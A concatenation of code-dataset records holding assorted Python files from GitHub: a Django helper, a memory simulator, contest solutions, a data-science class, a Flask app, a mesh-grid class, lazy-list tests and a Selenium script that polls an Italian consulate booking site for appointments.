self.CommunicationLogger.exception('[%s] == Exception =='%('setPriority'))\n return (-5, error_message)\n \n def getPriorityByUserID(self, user_id, _ContentType,_Record):\n try:\n group=User.objects.get(id=user_id)\n if(group is None):\n return (-1, 'User doesnot Exist')\n else:\n GroupId=group.Group_id\n priority= Priority.objects.filter(ContentType=_ContentType, Record= _Record, UserGroup=GroupId)\n if(priority is None):\n return (-1,'Priority Record does not exists for this User-Group and record')\n else:\n return priority.PriorityVal \n except:\n error_message= \"Error @ getPriorityByUserID in Business Function\"\n self.CommunicationLogger.exception('[%s] == Exception =='%('getPriorityByUserID'))\n return (-5, error_message)\n ","repo_name":"upcomingnewton/tx2","sub_path":"tx2/UserReg/BusinessFunctions/PriorityFnx.py","file_name":"PriorityFnx.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"21076150376","text":"import pdb\n\nclass Memory():\n FLASH, EEPROM, SRAM, REG = range(4)\n def __init__(self, size, memtype, base = 0):\n self.size = size\n self.memtype = memtype\n self.base = base\n self.highest_used = None\n \n self.mem = bytearray(self.size)\n self.bitmap = bytearray(self.size // 8)\n \n\n def empty(self, addr):\n \"\"\" Retorna True/False si 'addr' esta inicializada\n \"\"\"\n b = addr - self.base\n return (self.bitmap[b // 8] & (1 << (b % 8))) == 0\n \n \n def get_highest_used(self, to_str = False):\n \"\"\" Devuelve la direccion mas alta inicializada (en bytes!)\n \"\"\"\n if to_str:\n if self.highest_used == None:\n return \"Empty\"\n else:\n return \"0x{:04x}\".format(self.highest_used)\n else:\n return self.highest_used\n \n \n def update_highest_used(self, addr):\n if (self.highest_used == None) or (addr > self.highest_used):\n self.highest_used = addr\n\n \n def save_byte(self, addr, value):\n if (addr - self.base) >= self.size:\n print(\"Acceso fuera de la memoria\")\n return\n \n self.update_highest_used(addr)\n self.mem[addr - self.base] = value\n self.mark(addr)\n \n \n def get_byte(self, addr):\n if (addr - self.base) >= self.size:\n print(\"Acceso fuera de la memoria\")\n return\n if self.empty(addr): \n return\n return self.mem[addr - self.base]\n \n \n def get_word(self, addr):\n assert (addr % 2) == 0\n \n if (addr - self.base) >= self.size:\n print(\"Acceso fuera de la memoria\")\n return\n if self.empty(addr) or self.empty(addr + 1): \n return\n return self.mem[addr - self.base] + (self.mem[addr - self.base + 1] << 8)\n \n \n def mark(self, addr):\n b = addr - self.base\n self.bitmap[b // 8] |= (1 << (b % 8))\n \n \n def dump(self):\n s = \" +0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F\"\n for offs in range(self.size):\n if (offs % 16) == 0:\n s += \"\\n{:04x}: \".format(offs + self.base)\n if self.empty(offs + self.base):\n s+= \"-- \"\n else:\n s += \"{:02x} \".format(self.mem[offs])\n \n return s + \"\\n\"\n \n \n def dump_words(self):\n s = \" +0 +1 +2 +3 +4 +5 +6 +7 \"\n for offs in range(0, self.size, 2):\n if (offs % 16) == 0:\n s += \"\\n{:04x}: \".format(offs + self.base)\n if self.empty(offs + self.base):\n s+= \"---- \"\n else:\n s += \"{:04x} \".format((self.mem[offs+1] << 8) + self.mem[offs])\n \n return s + \"\\n\"\n \n \n def load_intel_hex(self, fname):\n with open(fname, \"r\") as hexf:\n for line in hexf.readlines():\n line = line.rstrip('\\n ')\n if len(line) < 11:\n continue\n if line[0] != ':':\n continue\n # Linea parece contener datos\n checksum = 0\n nr_bytes = int(line[1 : 3], 16)\n checksum += nr_bytes\n addr_h = int(line[3 : 5], 16)\n checksum += addr_h\n addr_l = int(line[5 : 7], 16)\n checksum += addr_l\n kind = int(line[7 : 9], 16)\n checksum += kind\n \n addr = (addr_h << 8) + addr_l\n \n #pdb.set_trace()\n if kind == 1: # Fin del archivo?\n t = int(line[9 : 11], 16)\n checksum += t\n if (checksum & 0xff) == 0:\n break\n else:\n return False\n \n elif kind != 0:\n continue\n \n # La linea contiene datos\n for offs in range(nr_bytes):\n b = int(line[9 + offs*2 : 11 + offs*2], 16)\n checksum += b\n self.save_byte(addr + offs, b)\n \n b = int(line[-2:], 16)\n checksum += b\n if (checksum & 0xff) != 0:\n return False\n \n \n\ndef main(args):\n print(\"testing sim_mem\")\n mem = Memory(1024, Memory.FLASH)\n print(\"Highest byte used: {:s}\".format(mem.get_highest_used(True)))\n mem.save_byte(10, 0xaa)\n print(\"Highest byte used: {:s}\".format(mem.get_highest_used(True)))\n \n mem.load_intel_hex(\"validate_hex.hex\")\n print(\"Highest byte used: {:s}\".format(mem.get_highest_used(True)))\n print(mem.dump_words())\n return 0\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","repo_name":"NicolasGomez097/DHS-2018","sub_path":"sim_mem.py","file_name":"sim_mem.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"72143034927","text":"from src.mutation.MutationABC import MutationABC\nfrom src.classes.Genotype import Genotype\nimport random\n\n\nclass SingleGeneMutation(MutationABC):\n\n @classmethod\n def mutate(cls, genes: Genotype, probability: float) -> Genotype | None:\n new_genes = genes.to_array()\n if random.uniform(0, 1) <= probability:\n # Random selection of the gene to mutate\n rand = random.randint(0, len(new_genes) - 1)\n # check if it is the height gene\n if rand == (len(new_genes) - 1):\n # Search and replace with mutated gene\n new_genes[rand] = random.uniform(1.3, 2.0)\n else:\n # Search and replace with mutated gene\n new_genes[rand] = random.uniform(0, 150)\n return Genotype.from_array(new_genes)\n","repo_name":"elianparedes/sia","sub_path":"tp2/src/mutation/SingleGeneMutation.py","file_name":"SingleGeneMutation.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73411788845","text":"# Problem: https://codeforces.com/problemset/problem/1650/C\n# nice data structure question :\n# we store the weight of each segment in a dictionary along with the segment number\n# we then sort the dictionary by the weight\n# we then iterate through the sorted dictionary and add the segment number and return the sum\n\n\nfor _ in range(int(input())):\n s = input()\n n, m = map(int, input().split())\n d = {}\n for i in range(m):\n x, v = map(int, input().split())\n d[x] = [v, i+1]\n d = sorted(d.items(), key=lambda x: x[1][0])[:2*n]\n sm = 0\n points = []\n for i, j in d:\n sm += j[0]\n print(sm)\n d = sorted(d, key=lambda x: x[0])\n for i in range(n):\n print(d[i][1][1], d[2*n-i-1][1][1])\n print()\n","repo_name":"StarkPrince/ONLINE_JUDGES","sub_path":"codeforces/A_Weight_of_the_System_of_Nested_Segments.py","file_name":"A_Weight_of_the_System_of_Nested_Segments.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14356177903","text":"import re\n\n\ndef extract_phone(input):\n phone_regex = re.compile(r\"\\d{3} \\d{3}-\\d{4}\")\n match = phone_regex.search(input)\n if match:\n return match.group()\n return None\n\n\nprint(extract_phone(\"my number is 432 567-8976\"))\n","repo_name":"ferreret/python-bootcamp-udemy","sub_path":"34-regex/sample2.py","file_name":"sample2.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"20207657130","text":"import os\nfrom dotenv import load_dotenv\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service #Fix deprecated executable_path\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver import ChromeOptions\nfrom selenium.webdriver.support.ui import Select\nfrom datetime import datetime\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException\nfrom time import sleep\nimport logging\nimport yaml\nimport sys\nimport time\nimport random\n\nload_dotenv()\n\nlogging.basicConfig(\n format=\"%(levelname)s:%(message)s\",\n level=logging.INFO,\n handlers=[logging.FileHandler(\"/tmp/out.log\"), logging.StreamHandler(sys.stdout)],\n)\n\n\nclass Prenota:\n def check_file_exists(file_name):\n # parent_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))\n file_path = os.path.join(os.getcwd(), file_name)\n return os.path.isfile(file_path)\n\n def load_config(file_path):\n # Open the YAML file\n with open(file_path, \"r\") as file:\n # Load the YAML content into a Python dictionary\n config = yaml.safe_load(file)\n return config\n\n if __name__ == \"__main__\":\n if check_file_exists(\"files/residencia.pdf\"):\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Required files available.\"\n )\n email = os.getenv(\"username\")\n password = os.getenv(\"password\")\n user_config = load_config(\"parameters.yaml\")\n print(user_config.get(\"full_address\"))\n chrome_options = ChromeOptions() #Some changes for optimize the load\n chrome_options.add_experimental_option(\"detach\", True)\n chrome_options.add_argument(\"--start-maximized\")\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n chrome_options.add_argument('--blink-settings=imagesEnabled=false')\n chrome_options.add_argument(\"--no-sandbox\")\n driver = webdriver.Chrome(\n options=chrome_options, service=Service(ChromeDriverManager(version=\"114.0.5735.90\").install(), #Some Changes for fix deprecated executable_path\n ))\n\n try:\n driver.get(\"https://prenotami.esteri.it/\")\n # Wait for the page to fully load\n email_box = WebDriverWait(driver, 60).until(\n EC.presence_of_element_located((By.ID, \"login-email\"))\n )\n password_box = driver.find_element(By.ID, \"login-password\")\n email_box.send_keys(email)\n password_box.send_keys(password)\n time.sleep(4) #2 default\n button = driver.find_elements(\n By.XPATH, \"//button[contains(@class,'button primary g-recaptcha')]\"\n )\n button[0].click()\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Successfuly logged in.\"\n )\n time.sleep(10)#Waiting some time to fully load after login and skip errors\n\n except Exception as e:\n logging.info(f\"Exception: {e}\")\n\n for i in range(200):\n random_number = random.randint(1, 5)\n\n if user_config[\"request_type\"] == \"citizenship\":\n try:\n driver.get(\"https://prenotami.esteri.it/Services/Booking/751\")\n time.sleep(10) #Waiting some time to fully load and skip errors\n \n try:\n appts_available = driver.find_element(\n By.XPATH, \"//*[@id='WlNotAvailable']\"\n ).get_attribute(\"value\")\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Scheduling is not available right now.\"\n )\n except NoSuchElementException:\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Element WlNotAvailable not found. Start filling the forms.\"\n )\n file_location = os.path.join(\"files/residencia.pdf\")\n choose_file = driver.find_elements(By.ID, \"File_0\")\n choose_file[0].send_keys(file_location)\n privacy_check = driver.find_elements(By.ID, \"PrivacyCheck\")\n privacy_check[0].click()\n submit = driver.find_elements(By.ID, \"btnAvanti\")\n submit[0].click()\n with open(\"files/citizenship_form.html\", \"w\") as f:\n f.write(driver.page_source)\n break\n except Exception as e:\n logging.info(f\"Exception {e}\")\n break\t\t\n elif user_config[\"request_type\"] == \"passport\":\n try:\n time.sleep(10) #Waiting some time to fully load and skip errors \n driver.get(\"https://prenotami.esteri.it/Services/Booking/1319\")#/Booking/671\n time.sleep(5) #Waiting some time to fully load and skip errors\n #driver.get(\"https://prenotami.esteri.it/Services/Booking/671\")\n #time.sleep(10) #Waiting some time to fully load and skip errors \n\n try:\n appts_available = driver.find_element(\n By.XPATH, \"//*[@id='WlNotAvailable']\"\n ).get_attribute(\"value\")\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Scheduling is not available right now.\"\n )\n except NoSuchElementException:\n try:\n h5_element = driver.find_element(\n By.XPATH, \"//h5[contains(text(), 'Stante l')]\"\n )\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Scheduling is not available right now (H5 message).\"\n )\n except NoSuchElementException:\n logging.info(\n f\"Timestamp: {str(datetime.now())} - Element WlNotAvailable not found. Start filling the forms.\"\n )\n\n with open(\"files/passport_form.html\", \"w\") as f:\n f.write(driver.page_source)\n\n q0 = Select(driver.find_element(By.ID,\"ddls_0\"))\n q0.select_by_visible_text(\n user_config.get(\"possess_expired_passport\")\n )\n\n q1 = Select(driver.find_element(By.ID,\"ddls_1\"))\n q1.select_by_visible_text(\n user_config.get(\"possess_expired_passport\")\n )\n\n q2 = driver.find_element(By.ID,\n \"DatiAddizionaliPrenotante_2___testo\"\n )\n q2.send_keys(user_config.get(\"total_children\"))\n\n q3 = driver.find_element(By.ID,\n \"DatiAddizionaliPrenotante_3___testo\"\n )\n q3.send_keys(user_config.get(\"full_address\"))\n\n q4 = Select(driver.find_element(By.ID,\"ddls_4\"))\n q4.select_by_visible_text(user_config.get(\"marital_status\"))\n\n time.sleep(1)\n\n file0 = driver.find_element(By.XPATH,'//*[@id=\"File_0\"]')\n file0.send_keys(os.getcwd() + \"/files/identidade.pdf\")\n\n time.sleep(1)\n\n file1 = driver.find_element(By.XPATH,'//*[@id=\"File_1\"]')\n file1.send_keys(os.getcwd() + \"/files/residencia.pdf\")\n\n checkBox = driver.find_element(By.ID,\"PrivacyCheck\")\n checkBox.click()\n\n form_submit = driver.find_element(By.ID,\"btnAvanti\")\n form_submit.click()\n\n break\n except Exception as e:\n logging.info(f\"Exception {e}\")\n break\n\n time.sleep(random_number)\n\n else:\n logging.info(\n \"Required files not available. Check the required files in readme.md file. Ending execution.\"\n )\n sys.exit(0)\n user_input = input(\n f\"Timestamp: {str(datetime.now())} - Go ahead and fill manually the rest of the process. When finished, type quit to exit the program and close the browser. \"\n )\n while True:\n if user_input == \"quit\":\n driver.quit()\n break","repo_name":"handreassa/prenotami","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":9657,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"27"} +{"seq_id":"36256318267","text":"odd = []\neven = []\ndata = input()\nreq = data.split(\" \")\nprint(req)\nfor i in req:\n if(i.isdigit()):\n i = int(i)\n if(i % 2 == 0):\n even.append(i)\n else:\n odd.append(i)\n\neven.sort()\nodd.sort(reverse=True)\n\nprint(even)\nprint(odd)","repo_name":"abhilashnambiar/dcodetech_python","sub_path":"data_type.py","file_name":"data_type.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8252460731","text":"from itertools import combinations\n\ndef solution(relation):\n answer = 0\n n = len(relation)\n m = len(relation[0])\n \n combi = []\n for i in range(1, n+1):\n combi.extend(combinations(range(m), i))\n \n key = []\n for c in combi:\n result = set()\n \n for i in range(n):\n temp = []\n for j in c:\n temp.append(relation[i][j])\n result.add(tuple(temp))\n \n if len(result) == n:\n flag = True\n for i in range(len(key)):\n if key[i].issubset(set(c)):\n flag = False\n break\n \n if flag:\n key.append(set(c))\n answer += 1\n \n return answer\n","repo_name":"M1nseoPark/CodingtestStudy","sub_path":"후보키.py","file_name":"후보키.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33308113236","text":"from __future__ import division\n\nimport numpy as np\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nimport math\nimport source.helpers as helpers\nimport networkx as nx\nimport pandas as pd\nfrom matplotlib.pyplot import figure\n\nclass AlgoComparer:\n def __init__(self, algo_type):\n self.algo_type = algo_type\n if algo_type == \"TSNE\":\n self.transformation = TSNE(n_components=2)\n else:\n print(\"Transformation not available. Unable to compare.\")\n\n def __calc_dist_between_points(self, set_1, set_2):\n dist = 0\n for coords_1 in set_1:\n for coords_2 in set_2:\n x1 = coords_1[0]\n y1 = coords_1[1]\n x2 = coords_2[0]\n y2 = coords_2[1]\n dist += math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n return dist\n\n def __calc_dist_within_classes(self, class_names, classes_strength, classes_coords):\n classes_dist = []\n for class_index in range(len(class_names)):\n class_coords = classes_coords[class_index]\n dist = self.__calc_dist_between_points(class_coords, class_coords)\n dist /= (classes_strength[class_index] * 2) # razy 2, bo każda odległość będzie liczona dwukrotnie\n classes_dist.append(dist)\n return classes_dist\n\n def __calc_dist_between_classes(self, class_names, classes_strength, classes_coords):\n classes_dist = []\n for class_1_index in range(len(class_names)):\n dist = 0\n strength = 0\n for class_2_index in range(len(class_names)):\n if class_1_index != class_2_index:\n class_1_coords = classes_coords[class_1_index]\n class_2_coords = classes_coords[class_2_index]\n dist += self.__calc_dist_between_points(class_1_coords, class_2_coords)\n strength += classes_strength[class_1_index] + classes_strength[class_2_index]\n classes_dist.append(dist / strength)\n return classes_dist\n\n def __prepare_dist_matrices(self, class_names, labels, transformation_data):\n classes_strength = np.zeros(len(class_names))\n classes_coords = []\n for class_name_idx in range(len(class_names)):\n class_coords = []\n for index in range(len(labels)):\n if str(labels[index]) == str(class_name_idx):\n classes_strength[class_name_idx] += 1\n class_coords.append(transformation_data[index])\n classes_coords.append(class_coords)\n return (classes_strength, classes_coords)\n\n def check_method_quality(self, class_names, class_labels, transformed_data):\n (classes_strength, classes_coords) = self.__prepare_dist_matrices(class_names, class_labels, transformed_data)\n classes_inner_dist = self.__calc_dist_within_classes(class_names, classes_strength, classes_coords)\n classes_outer_dist = self.__calc_dist_between_classes(class_names, classes_strength, classes_coords)\n coeff = sum(classes_inner_dist) / sum(classes_outer_dist)\n print(coeff)\n\n def visualise_transformed(self, points_transformed, colors, labels):\n points_transformed_t = points_transformed.T\n\n fig = plt.figure()\n ax = fig.add_subplot()\n scatter = ax.scatter(points_transformed_t[0], points_transformed_t[1], c=colors, cmap=plt.cm.coolwarm)\n ax.set_xlabel('X Label')\n ax.set_ylabel('Y Label')\n ax.legend(handles=scatter.legend_elements()[0], labels=labels)\n plt.rcParams[\"figure.figsize\"] = [12, 6]\n plt.show()\n\n def compare(self, data_processor):\n self.transformed_data = self.transformation.fit_transform(data_processor.data)\n self.check_method_quality(data_processor.names, data_processor.labels, self.transformed_data)\n # self.visualise_transformed(self.transformed_data, list(map(int, data_processor.labels.tolist())),\n # data_processor.names)\n","repo_name":"ilonatommy/ShapeVis","sub_path":"program/source/algo_comparer.py","file_name":"algo_comparer.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28449007630","text":"import numpy as np\r\nimport pandas as pd\r\nfrom flask import Flask, request, jsonify, render_template\r\nimport pickle\r\n\r\napp = Flask(__name__) #Initialize the flask App\r\nmodel = pickle.load(open('model.pkl', 'rb'))\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route('/predict',methods=['POST'])\r\ndef predict():\r\n '''\r\n For rendering results on HTML GUI\r\n '''\r\n int_features = [x for x in request.form.values()]\r\n final = np.array(int_features)\r\n data_unseen = pd.DataFrame([final], columns = ['Campaign Product Name', 'Region', 'Amount Spent (INR)']) \r\n \r\n prediction = model.predict(data_unseen)\r\n\r\n output = prediction\r\n\r\n\r\n return render_template('index.html', prediction_text='Result is')\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"saisurajkarra/Ad-Prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28071433743","text":"# pyright: reportMissingTypeStubs=false\nfrom dataclasses import dataclass\nfrom typing import Tuple\n\nimport numpy as np\nimport numpy.typing as npt\n\n\n@dataclass\nclass RectangularGrid:\n \"\"\"\n This Class structures a grid of points that can be used to make up a triangulation.\n\n The points are ordered in a rectangular form.\n\n Attributes\n ----------\n x_domain: Tuple[float, float]\n Tuple that describes the size of the domain in the x dimension.\n y_domain: Tuple[float, float]\n Tuple that describes the size of the domain in the y dimension.\n x_discretisation: int\n Integer value that describes the discretisation of the x dimension.\n y_discretisation: int\n Integer value that describes the discretisation of the y dimension.\n\n Properties\n ----------\n x_linespace: NDArray[np.float64]\n Array that devides the x dimension in the specified discrete points.\n y_linespace: NDArray[np.float64]\n Array that devides the y dimension in the specified discrete points.\n sorted_mesh_coords: NDArray[np.float64]\n Array with shape (n_dof,2) that describes x and y coordinates of each point in\n the grid. It is sorted in the way that all Dirichlet boundary points are last.\n\n Methods\n -------\n get_reordered_idx_neumann_right\n Returns an Array of indices where all indices of Dirichlet boundary points from the\n left side of the domain are in the end.\n \"\"\"\n\n x_domain: Tuple[float, float]\n y_domain: Tuple[float, float]\n x_discretisation: int\n y_discretisation: int\n\n @property\n def x_linspace(self) -> npt.NDArray[np.float64]:\n return np.linspace(self.x_domain[0], self.x_domain[1], self.x_discretisation)\n\n @property\n def y_linspace(self) -> npt.NDArray[np.float64]:\n return np.linspace(self.y_domain[0], self.y_domain[1], self.y_discretisation)\n\n @property\n def sorted_mesh_coords(self) -> npt.NDArray[np.float64]:\n \"\"\"\n This property generates a mesh of grid points based on the given domanin and discretisation.\n The mesh array is reshaped to (n_dof,2) where the first column are x coordinates and second\n column the y coordinates of each point of the grid. Then this Array is sorted such that all\n Dirichlet boundary points are moved to the end of the array.\n \"\"\"\n\n x_vertex_coords, y_vertex_coords = np.meshgrid(self.x_linspace, self.y_linspace)\n pre_ordered_y = np.roll(y_vertex_coords, -self.x_discretisation)\n x_vertex_coords = x_vertex_coords.flatten()\n pre_ordered_y = pre_ordered_y.flatten()\n pre_ordered_coords = np.vstack((x_vertex_coords, pre_ordered_y))\n reorder_idx = self.get_reordered_idx_neumann_right()\n split_pre_order = np.hsplit(\n pre_ordered_coords,\n np.array([self.x_discretisation * (self.y_discretisation - 2)]),\n )\n unordered_coords = split_pre_order[0]\n ordered_coords_back = split_pre_order[1].T\n ordered_coords_front: npt.NDArray[\n np.float64\n ] = unordered_coords.T[ # type:ignore\n reorder_idx\n ]\n sorted_vertices_coords = np.vstack(\n (ordered_coords_front, ordered_coords_back) # type:ignore\n )\n return sorted_vertices_coords\n\n def get_reordered_idx_dirichlet(self) -> npt.NDArray[np.int32]:\n \"\"\"\n The method is moving also the boundary terms from the left and right side to the end of the array\n of vertices. Hence, this method prepares the vertices in such a way that Dirichlet boundaries are\n assumed all around the domain.\n \"\"\"\n\n left_bdn_lst: list[int] = [\n self.x_discretisation * i for i in range(self.y_discretisation - 2)\n ]\n right_bdn_lst: list[int] = [\n (self.x_discretisation - 1) + i * self.x_discretisation\n for i in range(self.y_discretisation - 2)\n ]\n left_bdn_idx = np.array(left_bdn_lst)\n right_bdn_idx = np.array(right_bdn_lst)\n lr_bdn_id = np.hstack((left_bdn_idx, right_bdn_idx))\n complete_idx = np.arange(0, self.x_discretisation * (self.y_discretisation - 2)) # type: ignore\n inner_idx = np.setdiff1d(complete_idx, lr_bdn_id)\n reorder_idx = np.hstack((inner_idx, lr_bdn_id))\n return reorder_idx\n\n def get_reordered_idx_neumann_right(self) -> npt.NDArray[np.int32]:\n \"\"\"\n The method gives an index array which can be used to reorder the coordinate array such that also the\n boundary values from the left hand side are put to the back of the array. That way all Dirichlet\n boundary terms are moved to the end of the array. Only the Neumann boundary terms stay in their\n initial position.\n \"\"\"\n\n left_bdn_lst: list[int] = [\n self.x_discretisation * i for i in range(self.y_discretisation - 2)\n ]\n left_bdn_idx = np.array(left_bdn_lst)\n complete_idx = np.arange(0, self.x_discretisation * (self.y_discretisation - 2)) # type: ignore\n inner_idx = np.setdiff1d(complete_idx, left_bdn_idx)\n reorder_idx = np.hstack((inner_idx, left_bdn_idx))\n return reorder_idx\n\n def get_reverted_idx_neumann_right(self) -> npt.NDArray[np.int32]:\n \"\"\"\n Function to revert the reordering of the array. This is necessary to later reorder the solution arrays\n back to the original order for plotting for example the pressure scalar field.\n \"\"\"\n complete_idx = np.arange(0, self.x_discretisation * (self.y_discretisation - 2)) # type: ignore\n start_bdn_idx = (self.x_discretisation - 1) * (self.y_discretisation - 2)\n left_bdn_lst = [start_bdn_idx + i for i in range(self.y_discretisation - 2)]\n left_bdn_arr = np.array(left_bdn_lst)\n for j, bdn_idx in enumerate(left_bdn_lst):\n complete_idx = np.insert(complete_idx, j * self.y_discretisation, bdn_idx)\n complete_idx = np.delete(complete_idx, (left_bdn_arr + len(left_bdn_lst)))\n return complete_idx\n","repo_name":"ErikLahm/project_obstacle_flow","sub_path":"rectangular_grid.py","file_name":"rectangular_grid.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7281144582","text":"# 정수 배열 번호가 부여됩니다.\n# 이 배열로 게임을 하는 플레이어는 플레이어 1과 플레이어 2입니다.\n# 플레이어 1과 플레이어 2가 교대로 게임을 시작하고 플레이어 1이 먼저 시작합니다.\n# 두 플레이어는 모두 0의 점수로 게임을 시작합니다.\n# 매 턴마다 플레이어는 배열의 끝에서 숫자(즉, nums[0] 또는 nums[nums.length - 1])\n# 중 하나를 가져가서 배열의 크기를 1씩 줄입니다. 플레이어는 선택한 숫자를 점수에 추가합니다.\n# 배열에 더 이상 요소가 없을 때 게임이 종료됩니다.\n# 플레이어 1이 게임에서 이길 수 있다면 true로 반환합니다.\n# 두 플레이어의 점수가 같다면 플레이어 1은 여전히 승자이며, 또한 true로 반환해야 합니다.\n# 두 플레이어 모두 최적의 플레이를 하고 있다고 가정할 수 있습니다.\n\n\n# 예 1:\n# 입력 : 숫자 = [1,5,2]\n# 출력: false\n# 설명: 처음에는 플레이어 1이 1과 2 중 하나를 선택할 수 있습니다.\n# 2(또는 1)를 선택하면 플레이어 2는 1(또는 2)과 5 중에서 선택할 수 있습니다. 플레이어 2가 5를 선택하면 플레이어 1은 1(또는 2)로 남게 됩니다.\n# 따라서 선수 1의 최종 점수는 1 + 2 = 3이고, 선수 2는 5입니다.\n# 따라서 플레이어 1은 절대 승자가 될 수 없으며 거짓을 반환해야 합니다.\n\n# 예 2:\n# 입력 : 숫자 = [1,5,233,7]\n# 출력: true\n# 설명: 플레이어 1이 먼저 1을 선택합니다. 그 다음 플레이어 2는 5와 7 중 하나를 선택해야 합니다. 플레이어 2가 어떤 번호를 선택하든 플레이어 1은 233을 선택할 수 있습니다.\n# 마지막으로 플레이어 1이 플레이어 2(12)보다 점수(234)가 더 많으므로 True를 반환해야 플레이어 1이 이길 수 있습니다.\n\n# 플레이어 1이 승리할 경우의 수가 있는데, 그건 생각하지 않고 플레이어 2가 가장 큰 값을 갖게 하는걸 어떻게 하지?\ndef DFS(x):\n global one, two, ans\n if len(lst) == 0:\n print(one, two)\n if sum(one) >= sum(two):\n ans = True\n return\n if x==0:\n # 첫번째 값 계산\n one.append(lst.popleft())\n DFS(1)\n lst.appendleft(one.pop())\n # 마지막 값 계산\n one.append(lst.pop())\n DFS(1)\n lst.append(one.pop())\n else:\n # 첫번째 값 계산\n two.append(lst.popleft())\n DFS(0)\n lst.appendleft(two.pop())\n # 마지막 값 계산\n two.append(lst.pop())\n DFS(0)\n lst.append(two.pop())\n\nfrom collections import deque\nimport sys\nlst = deque(list(map(int, sys.stdin.readline().split())))\none, two, ans = [], [], False\nDFS(0)\nif ans:\n print(\"true\")\nelse:\n print(\"false\")","repo_name":"rlagusgh0223/Algorithm","sub_path":"230917/LeetCode.py","file_name":"LeetCode.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"71640445192","text":"x = range(100, 401)\nlista=[]\nfor i in x:\n y = str(i)\n setki = str(y[0])\n setki = int(setki)\n dziesiatki = str(y[1])\n dziesiatki = int(dziesiatki)\n jednosci = str(y[2])\n jednosci = int(jednosci)\n if setki%2 == 0 and dziesiatki%2 == 0 and jednosci%2==0:\n lista.append(i)\n\nprint (lista)\n \n","repo_name":"kacpermisiek/JSP2019","sub_path":"lista3/lista3zadanie10.py","file_name":"lista3zadanie10.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28378959931","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nFile: test_lazy_list.py\nAuthor: SpaceLis\nEmail: Wen.Li@tudelft.nl\nGithub: http://github.com/spacelis\nDescription:\n Basic tests\n\"\"\"\n__author__ = 'wenli'\n\nfrom unittest import TestCase\nfrom lazylist import LazyList\nfrom lazylist import LazyListClass\n\n\nclass TestLazyList(TestCase):\n\n \"\"\" Basic Tests\"\"\"\n\n def setUp(self):\n \"\"\"\n \"\"\"\n @LazyList\n def nat():\n \"\"\" A natural number sequence. \"\"\"\n i = 1\n while True:\n yield i\n i += 1\n self.nat = nat\n\n @LazyListClass\n def Nat(x):\n \"\"\" dummy \"\"\"\n i = x\n while True:\n yield i\n i += 1\n self.Nat = Nat\n\n\n def test_LazyList(self):\n \"\"\"\n @return: None\n \"\"\"\n a = self.nat\n self.assertEqual(a[3], 4)\n\n def test_lazy_filter(self):\n \"\"\"\n\n @return: None\n \"\"\"\n a = self.nat.filtered(lambda x: x % 2 == 0)\n for i in range(1000):\n self.assertEqual(a[i] % 2, 0)\n\n def test_LzayListClass(self):\n \"\"\"\n @return: None\n \"\"\"\n a = self.Nat(10)\n self.assertEqual(a[2], 12)\n\n","repo_name":"spacelis/lazylist","sub_path":"test/test_lazy_list.py","file_name":"test_lazy_list.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6843209976","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os, sys, codecs, chardet\nimport xml.etree.ElementTree as et\nfrom lxml import etree\nfrom lxml.etree import XMLParser, parse\n\n# Define the name space.\nns_opg = \"{http://fgd.gsi.go.jp/spec/2008/FGD_GMLSchema}\"\nns_fgd = 